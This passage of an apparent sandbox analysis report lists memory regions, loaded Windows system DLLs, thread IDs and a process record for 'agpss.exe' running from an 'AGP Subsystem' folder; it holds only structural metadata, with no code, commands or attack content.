start_va = 0x7fefb2b0000
end_va = 0x7fefb2c0fff
monitored = 0
entry_point = 0x7fefb2b14c0
region_type = mapped_file
name = "rtutils.dll"
filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll")
Region:
id = 2728
start_va = 0x7fef7c60000
end_va = 0x7fef7ca1fff
monitored = 0
entry_point = 0x7fef7c617e4
region_type = mapped_file
name = "sqmapi.dll"
filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll")
Region:
id = 2729
start_va = 0x7fef7ac0000
end_va = 0x7fef7b06fff
monitored = 0
entry_point = 0x7fef7ac1040
region_type = mapped_file
name = "wdscore.dll"
filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll")
Region:
id = 2730
start_va = 0x1fc0000
end_va = 0x212ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001fc0000"
filename = ""
Region:
id = 2731
start_va = 0x1020000
end_va = 0x106ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001020000"
filename = ""
Region:
id = 2732
start_va = 0x2130000
end_va = 0x231ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002130000"
filename = ""
Region:
id = 2733
start_va = 0x1020000
end_va = 0x104ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "netmsg.dll.mui"
filename = "\\Windows\\System32\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netmsg.dll.mui")
Region:
id = 2734
start_va = 0x1060000
end_va = 0x106ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001060000"
filename = ""
Region:
id = 2735
start_va = 0x2180000
end_va = 0x21fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002180000"
filename = ""
Region:
id = 2736
start_va = 0x22a0000
end_va = 0x231ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000022a0000"
filename = ""
Region:
id = 2737
start_va = 0x7fffff8a000
end_va = 0x7fffff8bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8a000"
filename = ""
Region:
id = 2738
start_va = 0x9d0000
end_va = 0x9d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 2739
start_va = 0x9d0000
end_va = 0x9d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 2740
start_va = 0x9d0000
end_va = 0x9d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 2741
start_va = 0x9d0000
end_va = 0x9d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 2742
start_va = 0x9d0000
end_va = 0x9d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 2743
start_va = 0x9d0000
end_va = 0x9d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 2744
start_va = 0x9d0000
end_va = 0x9d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 2745
start_va = 0x9d0000
end_va = 0x9d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 2746
start_va = 0x9d0000
end_va = 0x9d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 2747
start_va = 0x9d0000
end_va = 0x9d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 2748
start_va = 0x9d0000
end_va = 0x9d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 2749
start_va = 0x9d0000
end_va = 0x9d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 2750
start_va = 0x9d0000
end_va = 0x9d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 2751
start_va = 0x9d0000
end_va = 0x9d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 2752
start_va = 0x9d0000
end_va = 0x9d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 2753
start_va = 0x9d0000
end_va = 0x9d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 2754
start_va = 0x9d0000
end_va = 0x9d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 2755
start_va = 0x7fef7990000
end_va = 0x7fef7997fff
monitored = 0
entry_point = 0x7fef7991020
region_type = mapped_file
name = "sscore.dll"
filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll")
Region:
id = 2762
start_va = 0x1db0000
end_va = 0x1e2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001db0000"
filename = ""
Region:
id = 2763
start_va = 0x7fef78c0000
end_va = 0x7fef790ffff
monitored = 0
entry_point = 0x7fef78c1190
region_type = mapped_file
name = "clusapi.dll"
filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll")
Region:
id = 2764
start_va = 0x7fffff8a000
end_va = 0x7fffff8bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8a000"
filename = ""
Region:
id = 2765
start_va = 0x7fefcd90000
end_va = 0x7fefcda3fff
monitored = 0
entry_point = 0x7fefcd94160
region_type = mapped_file
name = "cryptdll.dll"
filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll")
Region:
id = 2766
start_va = 0x1f10000
end_va = 0x1f8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f10000"
filename = ""
Region:
id = 2767
start_va = 0x2200000
end_va = 0x227ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002200000"
filename = ""
Region:
id = 2768
start_va = 0x7fffff88000
end_va = 0x7fffff89fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff88000"
filename = ""
Region:
id = 2769
start_va = 0x2320000
end_va = 0x24affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002320000"
filename = ""
Region:
id = 2770
start_va = 0x24b0000
end_va = 0x261ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000024b0000"
filename = ""
Region:
id = 2771
start_va = 0x1f90000
end_va = 0x208ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001f90000"
filename = ""
Region:
id = 2772
start_va = 0x2620000
end_va = 0x27fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002620000"
filename = ""
Region:
id = 2773
start_va = 0x7fef7390000
end_va = 0x7fef73a8fff
monitored = 0
entry_point = 0x7fef7391104
region_type = mapped_file
name = "resutils.dll"
filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll")
Region:
id = 2774
start_va = 0x2360000
end_va = 0x23dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002360000"
filename = ""
Region:
id = 2775
start_va = 0x2430000
end_va = 0x24affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002430000"
filename = ""
Region:
id = 2776
start_va = 0x7fef7300000
end_va = 0x7fef7383fff
monitored = 0
entry_point = 0x7fef7351118
region_type = mapped_file
name = "netcfgx.dll"
filename = "\\Windows\\System32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll")
Region:
id = 2777
start_va = 0x7fffff86000
end_va = 0x7fffff87fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff86000"
filename = ""
Region:
id = 2778
start_va = 0x18a0000
end_va = 0x192ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000018a0000"
filename = ""
Region:
id = 2779
start_va = 0x2620000
end_va = 0x271ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002620000"
filename = ""
Region:
id = 2780
start_va = 0x2780000
end_va = 0x27fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 2781
start_va = 0x7fef8400000
end_va = 0x7fef85affff
monitored = 0
entry_point = 0x7fef8401010
region_type = mapped_file
name = "vssapi.dll"
filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll")
Region:
id = 2782
start_va = 0x7fef83e0000
end_va = 0x7fef83f6fff
monitored = 0
entry_point = 0x7fef83e1060
region_type = mapped_file
name = "vsstrace.dll"
filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll")
Region:
id = 2783
start_va = 0x2130000
end_va = 0x21affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002130000"
filename = ""
Region:
id = 2784
start_va = 0x24b0000
end_va = 0x253ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000024b0000"
filename = ""
Region:
id = 2785
start_va = 0x25a0000
end_va = 0x261ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000025a0000"
filename = ""
Region:
id = 2786
start_va = 0x7fffff84000
end_va = 0x7fffff85fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff84000"
filename = ""
Region:
id = 2787
start_va = 0x7fefc5d0000
end_va = 0x7fefc5e1fff
monitored = 0
entry_point = 0x7fefc5d1060
region_type = mapped_file
name = "devrtl.dll"
filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll")
Region:
id = 2788
start_va = 0x9d0000
end_va = 0x9d7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "vsstrace.dll.mui"
filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui")
Region:
id = 2789
start_va = 0x7fefb400000
end_va = 0x7fefb413fff
monitored = 0
entry_point = 0x7fefb4016b4
region_type = mapped_file
name = "samcli.dll"
filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll")
Region:
id = 2790
start_va = 0x18a0000
end_va = 0x191ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000018a0000"
filename = ""
Region:
id = 2791
start_va = 0x1920000
end_va = 0x192ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001920000"
filename = ""
Region:
id = 2792
start_va = 0x7fffff82000
end_va = 0x7fffff83fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff82000"
filename = ""
Region:
id = 2793
start_va = 0x7fefb500000
end_va = 0x7fefb573fff
monitored = 0
entry_point = 0x7fefb5066f0
region_type = mapped_file
name = "netprofm.dll"
filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll")
Region:
id = 2794
start_va = 0x7fefa9c0000
end_va = 0x7fefa9d0fff
monitored = 0
entry_point = 0x7fefa9c16ac
region_type = mapped_file
name = "dhcpcsvc6.dll"
filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")
Region:
id = 2795
start_va = 0x7fefb490000
end_va = 0x7fefb4fafff
monitored = 0
entry_point = 0x7fefb4d4344
region_type = mapped_file
name = "hnetcfg.dll"
filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll")
Region:
id = 2796
start_va = 0x2800000
end_va = 0x28fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002800000"
filename = ""
Region:
id = 2797
start_va = 0x2960000
end_va = 0x29dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002960000"
filename = ""
Region:
id = 2798
start_va = 0x7fffff80000
end_va = 0x7fffff81fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff80000"
filename = ""
Region:
id = 2799
start_va = 0x7fefa940000
end_va = 0x7fefa957fff
monitored = 0
entry_point = 0x7fefa941bf8
region_type = mapped_file
name = "dhcpcsvc.dll"
filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")
Region:
id = 2800
start_va = 0x2ac0000
end_va = 0x2b3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002ac0000"
filename = ""
Region:
id = 2801
start_va = 0x7fffff7e000
end_va = 0x7fffff7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff7e000"
filename = ""
Region:
id = 2802
start_va = 0x7fefb470000
end_va = 0x7fefb489fff
monitored = 0
entry_point = 0x7fefb483fbc
region_type = mapped_file
name = "nci.dll"
filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll")
Region:
id = 2848
start_va = 0x7fef7570000
end_va = 0x7fef757dfff
monitored = 0
entry_point = 0x7fef7575500
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 2849
start_va = 0x7fef6d30000
end_va = 0x7fef6e5bfff
monitored = 0
entry_point = 0x7fef6de0ef0
region_type = mapped_file
name = "wbemcore.dll"
filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll")
Region:
id = 2850
start_va = 0x2b90000
end_va = 0x2c0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002b90000"
filename = ""
Region:
id = 2851
start_va = 0x7fffff7c000
end_va = 0x7fffff7dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff7c000"
filename = ""
Region:
id = 2853
start_va = 0x7fef6cc0000
end_va = 0x7fef6d21fff
monitored = 0
entry_point = 0x7fef6cfbd80
region_type = mapped_file
name = "esscli.dll"
filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll")
Region:
id = 2855
start_va = 0x7fef7b80000
end_va = 0x7fef7c52fff
monitored = 0
entry_point = 0x7fef7bf8b00
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 2856
start_va = 0x7fef7b50000
end_va = 0x7fef7b76fff
monitored = 0
entry_point = 0x7fef7b511a0
region_type = mapped_file
name = "ntdsapi.dll"
filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")
Region:
id = 2873
start_va = 0x2c10000
end_va = 0x2d3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002c10000"
filename = ""
Region:
id = 2877
start_va = 0x2c40000
end_va = 0x2cbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002c40000"
filename = ""
Region:
id = 2878
start_va = 0x2cc0000
end_va = 0x2d3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002cc0000"
filename = ""
Region:
id = 2879
start_va = 0x7fef6b30000
end_va = 0x7fef6b42fff
monitored = 0
entry_point = 0x7fef6b31d80
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 2880
start_va = 0x7fffff7a000
end_va = 0x7fffff7bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff7a000"
filename = ""
Region:
id = 2881
start_va = 0x9e0000
end_va = 0x9e0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009e0000"
filename = ""
Region:
id = 2882
start_va = 0x9e0000
end_va = 0x9e0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009e0000"
filename = ""
Region:
id = 2883
start_va = 0x7fefc910000
end_va = 0x7fefc96afff
monitored = 0
entry_point = 0x7fefc916940
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 2884
start_va = 0x2d40000
end_va = 0x2edffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002d40000"
filename = ""
Region:
id = 2885
start_va = 0x2dd0000
end_va = 0x2e4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002dd0000"
filename = ""
Region:
id = 2886
start_va = 0x2e60000
end_va = 0x2edffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002e60000"
filename = ""
Region:
id = 2887
start_va = 0x7fefa470000
end_va = 0x7fefa477fff
monitored = 0
entry_point = 0x7fefa471414
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")
Region:
id = 2888
start_va = 0x7fffff78000
end_va = 0x7fffff79fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff78000"
filename = ""
Region:
id = 2903
start_va = 0x9e0000
end_va = 0x9e0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009e0000"
filename = ""
Region:
id = 2904
start_va = 0x7fef6b00000
end_va = 0x7fef6b20fff
monitored = 0
entry_point = 0x7fef6b103b0
region_type = mapped_file
name = "wmiutils.dll"
filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")
Region:
id = 2905
start_va = 0x7fef6aa0000
end_va = 0x7fef6af9fff
monitored = 0
entry_point = 0x7fef6addde0
region_type = mapped_file
name = "repdrvfs.dll"
filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll")
Region:
id = 2940
start_va = 0x2f90000
end_va = 0x300ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002f90000"
filename = ""
Region:
id = 2941
start_va = 0x7fffff76000
end_va = 0x7fffff77fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff76000"
filename = ""
Region:
id = 2944
start_va = 0x9e0000
end_va = 0x9e0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009e0000"
filename = ""
Region:
id = 2945
start_va = 0x30a0000
end_va = 0x311ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000030a0000"
filename = ""
Region:
id = 2946
start_va = 0x7fffff74000
end_va = 0x7fffff75fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff74000"
filename = ""
Region:
id = 2947
start_va = 0x3120000
end_va = 0x331ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003120000"
filename = ""
Region:
id = 2949
start_va = 0x7fef7a70000
end_va = 0x7fef7a7bfff
monitored = 0
entry_point = 0x7fef7a7602c
region_type = mapped_file
name = "npmproxy.dll"
filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")
Region:
id = 2950
start_va = 0x3320000
end_va = 0x341ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003320000"
filename = ""
Region:
id = 2951
start_va = 0x2d50000
end_va = 0x2dcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002d50000"
filename = ""
Region:
id = 2952
start_va = 0x7fffff72000
end_va = 0x7fffff73fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff72000"
filename = ""
Region:
id = 2953
start_va = 0x7fef5ab0000
end_va = 0x7fef5b64fff
monitored = 0
entry_point = 0x7fef5b2cf80
region_type = mapped_file
name = "wmiprvsd.dll"
filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll")
Region:
id = 2954
start_va = 0x7fef6ec0000
end_va = 0x7fef6ed1fff
monitored = 0
entry_point = 0x7fef6ec89d0
region_type = mapped_file
name = "ncobjapi.dll"
filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll")
Region:
id = 2955
start_va = 0x9e0000
end_va = 0x9e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000009e0000"
filename = ""
Region:
id = 2956
start_va = 0x1c90000
end_va = 0x1d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c90000"
filename = ""
Region:
id = 2957
start_va = 0x7fffff70000
end_va = 0x7fffff71fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff70000"
filename = ""
Region:
id = 2958
start_va = 0x29f0000
end_va = 0x2a6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000029f0000"
filename = ""
Region:
id = 2959
start_va = 0x3530000
end_va = 0x35affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003530000"
filename = ""
Region:
id = 2960
start_va = 0x7fffff6c000
end_va = 0x7fffff6dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff6c000"
filename = ""
Region:
id = 2961
start_va = 0x7fffff6e000
end_va = 0x7fffff6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff6e000"
filename = ""
Region:
id = 2962
start_va = 0x3620000
end_va = 0x369ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003620000"
filename = ""
Region:
id = 2963
start_va = 0x7fffff6a000
end_va = 0x7fffff6bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff6a000"
filename = ""
Region:
id = 2964
start_va = 0x3450000
end_va = 0x34cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003450000"
filename = ""
Region:
id = 2965
start_va = 0x7fffff68000
end_va = 0x7fffff69fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff68000"
filename = ""
Region:
id = 2972
start_va = 0x7fef5330000
end_va = 0x7fef53a0fff
monitored = 0
entry_point = 0x7fef53751d0
region_type = mapped_file
name = "wbemess.dll"
filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll")
Region:
id = 2973
start_va = 0x37d0000
end_va = 0x384ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000037d0000"
filename = ""
Region:
id = 2974
start_va = 0x7fffff66000
end_va = 0x7fffff67fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff66000"
filename = ""
Region:
id = 2977
start_va = 0x3880000
end_va = 0x38fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003880000"
filename = ""
Region:
id = 2978
start_va = 0x7fffff64000
end_va = 0x7fffff65fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff64000"
filename = ""
Region:
id = 2980
start_va = 0x3710000
end_va = 0x378ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003710000"
filename = ""
Region:
id = 2981
start_va = 0x7fffff62000
end_va = 0x7fffff63fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff62000"
filename = ""
Region:
id = 2982
start_va = 0x3970000
end_va = 0x39effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003970000"
filename = ""
Region:
id = 2983
start_va = 0x3a00000
end_va = 0x3a7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003a00000"
filename = ""
Region:
id = 2984
start_va = 0x7fffff5e000
end_va = 0x7fffff5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff5e000"
filename = ""
Region:
id = 2985
start_va = 0x7fffff60000
end_va = 0x7fffff61fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff60000"
filename = ""
Region:
id = 3317
start_va = 0xef0000
end_va = 0xf0bfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "firewallapi.dll.mui"
filename = "\\Windows\\System32\\en-US\\FirewallAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\firewallapi.dll.mui")
Region:
id = 3318
start_va = 0x1020000
end_va = 0x1035fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001020000"
filename = ""
Region:
id = 3319
start_va = 0xa80000
end_va = 0xa83fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a80000"
filename = ""
Region:
id = 3320
start_va = 0x24b0000
end_va = 0x252ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000024b0000"
filename = ""
Region:
id = 3321
start_va = 0x2530000
end_va = 0x253ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002530000"
filename = ""
Region:
id = 3322
start_va = 0x7fffff64000
end_va = 0x7fffff65fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff64000"
filename = ""
Thread:
id = 53
os_tid = 0x460
Thread:
id = 54
os_tid = 0x438
Thread:
id = 55
os_tid = 0x434
Thread:
id = 56
os_tid = 0x138
Thread:
id = 57
os_tid = 0x244
Thread:
id = 58
os_tid = 0x430
Thread:
id = 59
os_tid = 0x42c
Thread:
id = 60
os_tid = 0x420
Thread:
id = 61
os_tid = 0x148
Thread:
id = 62
os_tid = 0x3e4
Thread:
id = 63
os_tid = 0x3cc
Thread:
id = 64
os_tid = 0x3b4
Thread:
id = 65
os_tid = 0x3b0
Thread:
id = 66
os_tid = 0x364
Thread:
id = 67
os_tid = 0x360
Thread:
id = 68
os_tid = 0x35c
Thread:
id = 69
os_tid = 0x358
Thread:
id = 70
os_tid = 0x354
Thread:
id = 71
os_tid = 0x350
Thread:
id = 72
os_tid = 0x558
Thread:
id = 73
os_tid = 0x560
Thread:
id = 75
os_tid = 0x640
Thread:
id = 76
os_tid = 0x658
Thread:
id = 77
os_tid = 0x65c
Thread:
id = 78
os_tid = 0x670
Thread:
id = 79
os_tid = 0x674
Thread:
id = 80
os_tid = 0x6ac
Thread:
id = 81
os_tid = 0x6b0
Thread:
id = 82
os_tid = 0x6b8
Thread:
id = 83
os_tid = 0x6d8
Thread:
id = 84
os_tid = 0x6e4
Thread:
id = 85
os_tid = 0x720
Thread:
id = 86
os_tid = 0x728
Thread:
id = 88
os_tid = 0x738
Thread:
id = 89
os_tid = 0x744
Thread:
id = 90
os_tid = 0x74c
Thread:
id = 94
os_tid = 0x78c
Thread:
id = 95
os_tid = 0x790
Thread:
id = 96
os_tid = 0x578
Thread:
id = 97
os_tid = 0x5ac
Thread:
id = 98
os_tid = 0x1bc
Thread:
id = 99
os_tid = 0x15c
Thread:
id = 100
os_tid = 0x130
Thread:
id = 101
os_tid = 0x114
Thread:
id = 102
os_tid = 0x504
Thread:
id = 103
os_tid = 0x5f8
Thread:
id = 104
os_tid = 0x5a4
Thread:
id = 105
os_tid = 0x614
Thread:
id = 106
os_tid = 0x604
Thread:
id = 129
os_tid = 0x2e4
Process:
id = "10"
image_name = "agpss.exe"
filename = "c:\\program files (x86)\\agp subsystem\\agpss.exe"
page_root = "0x19775000"
os_pid = "0x72c"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "modified_file"
parent_id = "4"
os_parent_pid = "0x684"
cmd_line = "\"C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe\" "
cur_dir = "C:\\Windows\\SysWOW64\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f343" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 2803
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 2804
start_va = 0x30000
end_va = 0x31fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 2805
start_va = 0x40000
end_va = 0x40fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 2806
start_va = 0x50000
end_va = 0x53fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000050000"
filename = ""
Region:
id = 2807
start_va = 0x60000
end_va = 0x60fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000060000"
filename = ""
Region:
id = 2808
start_va = 0x90000
end_va = 0xcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000090000"
filename = ""
Region:
id = 2809
start_va = 0x290000
end_va = 0x38ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000290000"
filename = ""
Region:
